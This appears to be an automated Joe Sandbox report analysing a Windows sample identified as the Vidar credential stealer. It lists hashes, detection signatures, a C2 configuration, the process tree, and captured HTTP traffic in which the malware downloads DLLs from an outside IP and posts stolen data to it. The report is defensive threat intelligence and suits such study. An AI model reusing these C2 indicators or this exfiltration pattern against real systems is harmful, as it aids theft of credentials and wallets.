Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1430555
MD5:c7cb10eadcca31c88538f972fd657590
SHA1:9b09cdc280601e63579ae2cb64d863a0419d971c
SHA256:fabac53ffc7381edddcaddca2c9b2d647dd30a2e66d62c3cca720349f1e66d4e
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4092 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C7CB10EADCCA31C88538F972FD657590)
    • RegAsm.exe (PID: 2632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 7144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 4092JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: RegAsm.exe PID: 2632JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 2 entries
              SourceRuleDescriptionAuthorStrings
              1.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                1.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.450000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004117A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_004117A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406F90 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00406F90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409330 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_00409330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406F10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406F10
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 95.217.244.99:443 -> 192.168.2.6:49701 version: TLS 1.2
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                    Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                    Source: Binary string: C:\5lpar31fck04x\Body.pdb source: file.exe
                    Source: Binary string: nss3.pdb source: nss3.dll.1.dr, nss3[1].dll.1.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                    Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDB23 FindFirstFileExW,0_2_004EDB23
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE007 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004EE007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040B1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00416740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00417800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00416F50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004173C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040A660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040AAE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_00416BB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199677575543
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 7797Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 122813Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: unknownTCP traffic detected without corresponding DNS query: 95.217.244.99
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00404490 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00404490
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Cache-Control: no-cache
                    Source: unknownDNS traffic detected: queries for: steamcommunity.com
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.244.99Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
